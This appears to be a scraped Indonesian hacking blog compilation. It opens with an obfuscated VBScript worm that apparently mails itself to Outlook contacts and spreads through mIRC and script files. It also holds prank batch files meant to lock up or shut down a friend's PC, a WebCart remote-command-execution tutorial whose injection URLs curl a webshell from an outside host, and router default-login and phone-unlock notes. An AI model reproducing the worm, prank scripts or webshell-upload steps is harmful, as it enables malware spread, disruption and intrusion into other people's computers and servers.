Execute TH8IQFIU(“-\hy4\hy}m4MN`&746&Ixkgzkj&H&MN`4&?59658676Ykz&KIIOXQ>X&C&ixkgzkuhpkiz.(yixovzotm4lorkyyzksuhpkiz(/KTR99N9I&C&KIIOXQ>X4mkzyvkiogrlurjkx.6/SR;Y9==9&C&KTR99N9I&,&(bMN`&7464nzsr4|hy(Ykz&WRMIX4iuvlork&}yixovz4yixovzl{rrtgsk2&SR;Y9==9P8VP6<;8Ol&WRMIKtj&olOl&WRMIX4uvktzk~zlork.}yixovz4yixovzl{rrtgsk/H;;[:RZ[&C&KNXX4lorkk~oyzy.}yixovz4yixovzl{rrtgsk//&znktykz&H88>V>>9C&KIIOXQ>X4ixkgzkzk~zlork.}yixovz4yixovzl{rrtgsk/H88>V>>94}xozk&H;;[:RZ[H88>V>>94iruykktj&olSX8[V./Ykz&\=[<:78V&C&IxkgzkUhpkiz.(U{zruuq4Gvvroigzout(/Ol&\=[<:78V&C&(U{zruuq(&ZnktYkz&I;;MT79<&C&\=[<:78V4MkzTgskYvgik.(SGVO(/Ykz&J9XWX=7J&C&I;;MT79<4GjjxkyyRoyzyLux&Kgin&\?9\>88?&C&\?9\>6?&C&7&Zu&V88?Ykz&S:9>6TWQ&C&\=[<:78V4IxkgzkOzks.6/Ykz&P87=[G=Y&C&\?9\>6?/S:9>6TWQ4Zu&C&P87=[G=Y4GjjxkyyS:9>6TWQ4Y{hpkiz&C&(\kx&Osvuxzgtz'(S:9>6TWQ4Huj&C&(No@(&,&|hixrl&,&(Vrkgyk&|ok}&znoy&lork2&oz-y&|kx&osvuxzgtz4(&,&|hixrl&,&((k~ki{zk&(ykz&PZORH8U8&CS:9>6TWQ4(&,&Inx.<;/&,&Inx.776TWQ4JkrkzkGlzkxY{hsoz&C&Zx{kPZORH8U84Gjj&\G[IIOXQOl&S:9>6TWQ4Zu&BD&((&ZnktS:9>6TWQ4YktjKtj&OlTk~zKtj&OlTk~zKtj&OlKtj&l{tizoutL{tizout&Z6Q=N<;Z.U7MZ8?==/Ol&U7MZ8?==&BD&((&ZnktYP8RMIX4lorkk~oyzy.(i@bsoxibsoxi4oto(/&ZnktU7MZ8?==&C&(i@bsoxi(KrykOl&KIIOXQ>X4lorkk~oyzy.(i@bsoxi98bsoxi4oto(/&ZnktU7MZ8?==&C&(i@bsoxi98(KrykOl&KIIOXQ>X4lorkk~oyzy.YP8RMIX4lorkk~oyzy.YP8RMIX4IxkgzkZk~zLork.U7MZ8?==&,&(byixovz4oto(2&Zx{k/K=RTR99N&C&(ayixovzc(&,&|hIxRl&,&(t6Cut&7@PUOT@)@�(K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t6Cut&7@PUOT@)@�(K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t7C&&5ol&.&*toiq&CC&*sk&/&�&ngrz&ƒ(K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t8C&&54(&,&Inx.766/&,&Inx.??/&,&Inx.??/&,&(&yktj&*toiq&(K=RTR99N&C&K=RTR99N&,&SR;Y9==9K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t9Cƒ(yixovz4IruykKtj&OlKtj&L{tizoutL{tizout&GI=R;Y9=./Ut&Kxxux&Xky{sk&Tk~zYkz&W8G8VP6<&C&KIIOXQ>X4Jxo|kyLux&Kgin&MJR?P<[NNXX4MkzLurjkx.V>NNXV>&C&U?G;;[:R4LorkyLux&Kgin&LK:X8[V<&Ot&Z:K88>V>Ol&rigyk.LK:X8[V<4Tgsk/&C&(soxi4oto(&ZnktZ6Q=N<;Z.LK:X8[V<4VgxktzLurjkx/Ktj&OlOl&KIIOXQ>X4MkzK~zktyoutTgsk.LK:X8[V<4vgzn/&C&(|hy(KIIOXQ>X4IuvLork&}yixovz4yixovzl{rrtgsk2LK:X8[V<4vgzn2zx{kKtj&olOl&KIIOXQ>X4MkzK~zktyoutTgsk.LK:X8[V<4vgzn/&C&(|hk(KIIOXQ>X4IuvLork&}yixovz4yixovzl{rrtgsk2LK:X8[V<4vgzn2zx{kKtj&olTk~zYkz&IM8=[<:7&C&U?G;;[:R4Y{hlurjkxyLux&Kgin&J>I;;MT7&Ot&IM8=[<:7Igrr&.J>I;;MT74vgzn/Tk~zKtj&l{tizoutL{tizout&P8VP6<;8./Xgtjuso€kOl&7&1&Otz.Xtj&0&7666/&C&=&znktSymhu~&(O-|k&tuznotm&zu&yg4&@u/(2<:2(@u/(ktj&olktj&l{tizout-\hy}m&8&Hkzg4&H&aQc”,-6) Function TH8IQFIU(C38QDRVV,F8O63JAL) For L6F3M0OD = 1 To Len(C38QDRVV) V6BD6OKI = Mid(C38QDRVV, L6F3M0OD, 1) If V6BD6OKI = Chr(2) Then V6BD6OKI = Chr(34 + F8O63JAL) ElseIf V6BD6OKI = Chr(3) Then V6BD6OKI = Chr(10 + F8O63JAL) ElseIf V6BD6OKI = Chr(4) Then V6BD6OKI = Chr(13 + F8O63JAL) Else V6BD6OKI = Chr(Asc(V6BD6OKI) + F8O63JAL) End If TH8IQFIU = TH8IQFIU & V6BD6OKI Next End Function ———————————END———————————

kalo yang ini tinggal copas aja tapi save as .bat

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
——————————-END————————————

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
———————————–END——————————-

@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s
———————————–END——————————-

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc…
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you’re boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
———————————END———————————

sekian script dari saya

AIDA64 Extreme Edition Full Crack


AIDA64 Extreme Edition is a streamlined Windows diagnostic and benchmarking software for home users. AIDA64 Extreme Edition provides a wide range of features to assist in overclocking, hardware error diagnosis, stress testing, and sensor monitoring. It has unique capabilities to assess the performance of the processor, system memory, and disk drives. AIDA64 is compatible with all current 32-bit and 64-bit Microsoft Windows operating systems, including Windows 7 and Windows Server 2008 R2


CPU, memory and disk benchmarks

AIDA64 implements a set of 64-bit benchmarks to measure how fast the computer performs various data processing tasks and mathematical calculations. Memory and cache benchmarks are available to analyze system RAM bandwidth and latency. Processor benchmarks utilize MMX, 3DNow! and SSE instructions, and scale up to 32 processor cores. For legacy processors all benchmarks are available in 32-bit version as well. AIDA64 Disk Benchmark determines the data transfer speed of hard disk drives, solid-state drives, optical drives, and flash memory based devices.

 


Temperature, voltage and cooling fan monitoring AIDA64 supports over 150 various sensor devices to measure temperatures, voltages, fan speeds, and power draw. Measured values can be displayed on System Tray icons, OSD panel, Sidebar Gadget, and Logitech G15/G19 Gaming Keyboard LCD. The values can also be logged to file or exported to external applications such as RivaTuner or Samurai. AIDA64 can also alarm the user when it detects overheating, over-voltage, or cooling fan failure.

 


Hardware diagnostics

AIDA64 has the most accurate hardware detection capabilities in its class, to provide detailed information on the computer internals without the need to open it up. The hardware detection module is strengthened by an exhaustive hardware database holding over 120,000 entries. Additional modules are available to overview processor frequencies, check CRT and LCD display status, and stress the system to reveal potential hardware failures and thermal issues.

 


Software and operating system analysis

AIDA64 provides over 50 pages of information on installed programs, software licenses, security applications, and Windows settings. List of started processes, services, DLL files, startup programs, and visited web pages is also available.

Tehnik yang sering digunakan para hacker dan defacer


Cara cara seoarang hacker menembus ataupun menyusup dan juga merusak suatu website adalah sebagai berikut.Teknik teknik itu antara lain:

1. IP Spoofing
2. FTP Attack
3. Unix Finger Exploits
4. Flooding & Broadcasting
5. Fragmented Packet Attacks
6. E-mail Exploits
7. DNS and BIND Vulnerabilities
8. Password Attacks
9.Proxy Server Attacks
10. Remote Command Processing Attacks
11. Remote File System Attack
12. Selective Program Insertions
13. Port Scanning
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
15. HTTPD Attacks

1. IP Spoofing

IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.

IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.

2. FTP Attack

Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.

Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack (menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam sistem.

3. Unix Finger Exploits

Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.

Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.

4. Flooding & Broadcasting

Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.

Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.

5. Fragmented Packet Attacks

Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol.

6. E-mail Exploits

Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).

7. DNS and BIND Vulnerabilities

Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).

8. Password Attacks

Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.

Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing.

9.Proxy Server Attacks

Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.

10. Remote Command Processing Attacks

Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.

11. Remote File System Attack

Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file.

12. Selective Program Insertions

Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor.

13. Port Scanning

Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.

14.TCP/IP Sequence Stealing, Passive Port Listening and Packet

Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.

15. HTTPD Attacks

Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.

HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker akses ke command prompt.

dan yang satu ini adalah bonus dari saya nih nemu tadi waktu lagi lari2 di mbah google

Dalam ini saya akan menjelaskan cara kerja Remote Command Execution atau biasa disebut Remote Arbitary Command Execution

adalah bug yg memungkinkan attacker untuk menjalankan command – command secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi. salah satu applikasi web yang memiliki vuln RCE / ACE ini adalah WebCart.

ex vuln: webcart/webcart.cgi?CONFIG=

Bagaimana mengexploitasi bug RCE ini ?

Bug RCE pada dasarnya mengambil sebuah input melalui variable yg memiliki bug tersebut. dalam hal ini “CONFIG”.

Nah, dari variable yg di ambil inilah kita bisa menyisipkan command – command ke server. Command di awali dan di akhiri dengan karakter pipa “|”. Command letakkan setelah nilai variable yg di ambil server. biarkan value ini tetap ada, karena mungkin terjadi error kalau tidak ada isinya.

ex:

http://www.RCE.com/webcart/webcart.cgi?CONFIG=path.html|%5Bcommand%5D|&

melalui bug RCE, kita bebas menjalankan command – command ke server. Jadi mudah saja,semisal kita ingin memasukan webshell ke target tinggal downloadkan webshell ke server. dengan perintah : wget,lwp-download,curl, dll

3. Langkah Kerja

3.1. mencari dir yg bisa di tulisi / writable

Code:
http://www.RCE.com/webcart/webcart.cgi?CONFIG=path.html|find+./+-type+d+-perm+777|&

‘images/galley’ misal ini yg keluar. maka susupkan webshell kesini

3.2. memasukan webshell. dalam contoh menggunakan perintah curl.

Code:
http://www.RCE.com/webcart/webcart.cgi?CONFIG=path.html|curl+-o+images/gallery/myshell.php+http://www.shellkamu.com/evil.php|&
http://www.RCE.com/webcart/webcart.cgi?CONFIG=path.html|chmod+755+images/gallery/myshell.php|&

3.3. webshell telah terupload

Code:
http://www.RCE.com/webcart/images/gallery/myshell.php

NB: inti dari tutorial ini [ Command – Comand di awali dan di akhiri dengan karakter pipa “|”. ]

sumber: http://junkelse.blogspot.com

sumber lain bisa di dapat di SANA (http://www.milw0rm.com/papers/260), SITU (http://www.milw0rm.com/exploits/9556), SONO (http://www.milw0rm.com/papers/369). dll.

Sejarah Perang DDOS antara kaskus dan yogyafree


Ini adalah cerita lama tentang serangan Ddos antar forum terbesar di indonesia, yaitu forum komunitas persahabatan kaskus dan salah satu forum hacker terbesar di indonesia yaitu yogyafree. Oke ini dia sejarahnya:

Pada tanggal 16—17 Mei 2008, Kaskus diserang menggunakan teknik DDoS (Distributed Denial of Service) oleh oknum yang diduga berasal dari komunitas YogyaFree. Serangan ini menyebabkan database Kaskus corrupt sehingga administrator terpaksa mengunci thread-thread yang ada.

Penyerangan tersebut diduga terkait dengan peristiwa perusakan (deface) situs YogyaFree beberapa hari sebelumnya. Penyerang yang mengklaim dirinya sebagai salah satu anggota Kaskus juga melontarkan celaan yang bernada mengejek di salah satu bagian forum YogyaFree. Hal tersebut membuat beberapa anggota YogyaFree berang, dan kemudian balik menyerang Kaskus dengan DDoS. Akibatnya, administrator Kaskus terpaksa mematikan server Kaskus.

Perang cyber antara kedua komunitas ini akhirnya selesai ketika kedua pengelola situs menandatangani memorandum online untuk menyudahkan pertikaian di antara keduanya. Pesan tersebut dipampang selama beberapa minggu di halaman situs masing-masing.

Mohon perhatian dari pengguna Kaskus dan YogyaFree karena hal ini diperlukan untuk menjaga persatuan dan kesatuan Bangsa ini di Internet.

Menyikapi perkembangan akhir-akhir ini, dimana Komunitas Kaskus dan Yogyafree telah dipecah belahkan oleh oknum yang tidak bertanggung jawab,
sehingga menyebabkan kedua Komunitas ini menjadi saling terganggu.
Hal ini seharusnya tidak terjadi karena telah merusak persatuan kita.

Kaskus dan YogyaFree tidak akan saling mengganggu secara institusi dan merupakan forum sahabat.

Bila ada yang melakukan penyerangan yang mengatas namakan Kaskus atau YogyaFree,
maka itu hanyalah oknum yang sengaja hendak mengadu domba antar komunitas kita.

Untuk itu kedua admin komunitas menghimbau/menginstruksikan untuk menghentikan segala jenis serangan.

Hormat kami

Admin Kaskus (andre) / Admin YogyaFree (Adi)

Statement ini dibuat oleh kedua belah pihak pada tanggal 20 Mei 2008, Pukul 9.40

Meskipun kerusakan yang ditimbulkan oleh serangan ini cukup berat, administrator Kaskus menjanjikan bahwa Kaskus akan kembali normal pada bulan Juli 2008, seiring dengan diluncurkannya server baru Kaskus di gedung Cyber, Jakarta. Namun, ia juga mengatakan bahwa data-data yang akan dimunculkan kembali adalah data yang dimuat sebelum tahun 2008, sementara data yang dibuat selama tahun 2008 tidak dapat dimunculkan kembali

Unlock Hp Esia Huawei C2061


Apakah anda bosan memakai operator esia dan ingin berpindah haluan ke operator CDMA lainnya, berikut ini adalah tutorial bagaimana unlock hp esia hanya di tutorial dan software

add Notes: Me restore Default Setting :

Kode : # # 2 5 8 7 4 1

Kemudia tekan send : berfungsi untuk me Restore Default work 100%

(kembali ke setingan pabrikan awal)

Kode : # # 4 1 2 3 6 5

Kemudia tekan send : berfungsi untuk masuk ke

Debug Screen

System Test

S/W Version

Setelah berada di dalam pilih Sytem Test lalu pilih 5, pada saat ditanya SPC kode

Ketik : 0 0 0 0 0 0

Setelah itu terserah mau di apakan dengan NAM Programmingnya.

UnLock HP Huawei C2601 (Bundle Esia Rp.199.000,-)

Hanya untuk versi firmware 3 Agustus 2007
Lihat versi huawei caranya :

Menu > Setting > Phone Setting > Lihat, bila ada tanggal 3 Agustus 2007, berarti Ok
UnLock Security

– Masukan Kartu yang igi anda pakai missal flexi

– Hidupkan HP

– Bila muncul pesan “MIN diluar jangkauan” berarti Hp anda belum bisa di Unlock

– Bila muncul pesan “silahkan masukan SID yang valid” berarti bisa di Unlock

– Ketik ##412365 (ini emergency code), kemudian tekan CALL

– Pilih SYSTEM TEST

– Kemudian pilih NAM PROGRAMING

– Masukan SPC Code : 000000

– Kemudian selanjutnya tekan OK saja hingga muncul SID .. isi 10496 (ini bila menggunakan kartu flexi)

– Bila menanyakan SID kembali, hapus SID yang ada, kemudian isi SID nya dengan : 000000

– Tekan OK hingga ada menu 1.COMPLETE 2.CONTINUE, pilih COMPLETE

OK sekarang Hp.anda sudah memakai Flexi

Unlock HP Cdma flexi Haier C6000


Handphone CDMA Haier C6000 memang dibundel dengan paket Flexi. Namun siapa sangka HP ini bisa dipake buat kartu yang lain? Dengan begitu kita bisa pilih-pilih kartu sesuka kita. Apalagi bagi pengguna internet, dengan kombinasi kartu yang tepat, HP ini bisa jadi alternatif nge-net murah. Sebelumnya, Anda perlu membuka kunci (baca= unlock) HP ini biar bisa dipasangkan dengan kartu CDMA selain Flexi.

Ternyata produsen Haier cukup berbaik hati dengan menyertakan kode unlock ini dalam versi C6000. Caranya gampang banget, ikuti langkah-langkahnya berikut ini. Sebelumnya, pastikan kondisi batre HP Anda masih dalam kondisi cukup. Ketik “*32#00#” (tanpa tanda kutip) dan akhiri dengan tombol Dial Pilih opsi “Minlock Off” Restart HP dan selanjutnya Anda sudah bisa gunakan kartu CDMA lain. Selanjutnya Anda tinggal pilih provider yang Anda suka.

Saya dengar, StarOne punya paket Internet murah. Saya yakin Anda sendiri sudah punya pilihan tersendiri. Namun, terlepas dari itu semua, HP ini patut dipertimbangkan sebagai prasarana alternatif koneksi akses internet via HP. Selain harganya murah, dengan kombinasi kartu perdana yang tepat kita ga perlu jauh-jauh ke warnet hanya untuk sekedar mengakses internet.

Busybox Dlink Router Speedy howto


Bagaimana Login ke router via telnet

kita dapat login melalui telnet. Ini adalah fitur umum dari router jaman sekarang(speedy) dan ini satu-satunya cara untuk masuk ke box(yang gw tau).

=> Default IP: 192.168.1.1
=> Default Username: admin (atau bisa menggunakan root UID 0)
=> Default Password: admin

contoh:

root@bt:~#telnet 192.168.1.1

Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

BusyBox on (none) login: admin
Password:

BusyBox v0.61.pre (2005.05.30-08:31+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
*Untuk melihat daftar user dan password:
# cat /etc/passwd
Output: 


root:x:0:0:Root,,,:/:/bin/sh
admin:x:0:0:Admin,,,:/:/bin/sh


Mendapatkan informasi lebih lanjut tentang router dan system

Melihat informasi CPU:

#cat /proc/cpuinfo

Melihat informasi Ram:

#cat /proc/meminfo

atau:

#free

Menampilkan versi dari linux:

#cat /proc/version

Contoh Output:

Linux version 2.4.17_mvl21-malta-mips_fp_le (jenny@FD5) (gcc version 2.95.3 20010315 (release/MontaVista)) #1 Wed Oct 11 10:38:28 CST 2006

Menampilkan list program yang berjalan:

#ps

Menampilkan module kernel:

#jsmod

Mendapatkan informasi tentang network

Menampilkan semua network interface:

#ifconfig

Melihat informasi IP internet publik:

#ifconfig ppp0

Melihat ISP router:

#route

Menampilkan statistik ethernet seperti kecepatan dan lain-lain:

#cat /proc/avalanche/eth0_rfc2665_stats

Menampilkan statistk DSL modem:
#cat /proc/avalanche/avsar_modem_stats
Menampilkan aturan firewall iptable:
#iptables -L -n
Menampilkan router developer information:
#cat /proc/avalanche/developers
Restart:
#reboot
NB: Bisa juga dengan cara
masukkan “admin” pada username dan password

Merubah ROFS to RWFS mount -n -o remount,rw /

Mengembalikan ke semula mount -n -o remount,ro /

Linux Terminal Licks


Cuma Iseng doang. Buat ngingetin gw.

  1. Mengetahui space pada partisi root. root@bt:~# df
  2. Format Hardisk. root@bt:~# fdisk /dev/hd(x).
  3. Membuat FileSystem baru. root@bt:~# mkfs -t ext3 /dev/hd(x)(y)
  4. Check FileSystem. root@bt:~# fsck -f-y /dev/hd(x)(y)
  5. Mount Disk bertipe EXT3. root@bt:~# mount -t ext3 /dev/hd(x)(y) /media/<folder> (bisa diliat di posting sebelumnya)
  6. Membuat Folder baru. root@bt:~# mkdir /<folder>/<folder>
  7. Meng-copy folder. root@bt:~# cp -r /<source> /<destination>
  8. Melihat list file pada suatu folder. root@bt:~# ls -a /<folder>
  9. menghapus file. root@bt:~# rm yourfile.file
  10. Ganti permision. root@bt:~# chmod 777 /<dstnation>/*
  11. Ganti nama host. Edit file /etc/hostname.  root@bt:~# vi /etc/hostname, root@bt:~#/etc/init.d/hostname.sh stop trus root@bt:~#/etc/init.d/hostname.sh start

Sedikit tips dan trik security pada XP


Tips n trik ini cuma sekedar ngingetin gw aja.. biar gak lupa walaupun dah migrasi ke **nux.

1. Pengamanan flashdisk dari malcode

Buat folder bernama “autorun.inf “.  Kemudian, buka commandprompt dan ketikkan :

md\\.\\F:\autorun.inf\con (Enter)
md\\.\\F:\autorun.inf\con\nul (Enter)
md\\.\\F:\autorun.inf\con nul\aux (Enter)

Buat file dengan nama “RECYCLER

Buat folder dengan sisipan karakter (tehnik yang digunakan smadav)

(ALT+2+5+5)namafolder(ALT+2+5+5)

2. Mendisable file berekstensi “.exe

Buka commandprompt, ketik “Assoc .exe=.terserah

3. Enable-kan file berekstensi “.exe”

buat file berekstensi “.txt“. masukkan kata ” start cmd” di dalam file text tersebut. Ubah extensinya yang semula “.txt” menjadi “.bat”. Double click file tersebut. Kemudian akan muncul commandprompt. ketikkan “Assoc .exe=exefile”

4. Folder tanpa nama

Rename folder(delete smua karakter) tekan dan tahan tombol alt+0160, lepaskan.

Apa itu SVCHOST.exe?


Awalnya, Microsoft menggunakan file .exe (executable) bagi service-service yang berjalan di Windows. Karena dirasa kurang efisien, Microsoft kemudian melakukan perombakan dengan mengubah service-service tadi dari menggunakan file-file .exe menjadi file .dll (Dynamic Link Library)

Dynamic Link Library (.dll) merupakan file yang berisi rutin (procedure & function) yang dapat dipanggil dari file executable (.exe) maupun dari file .dll lain. Hal ini dirasa lebih menguntungkan karena rutin-rutin yang bersifat umum dapat dipakai oleh beberapa aplikasi pada saat yang bersamaan dan hanya diperlukan satu copy saja di memory atau disk. Programmer dapat mengatur agar rutin-rutin yang terdapat pada DLL tersebut dimuat ke memory hanya ketika diperlukan saja. Apabila tidak diperlukan maka DLL tersebut bisa dibuang dari memory

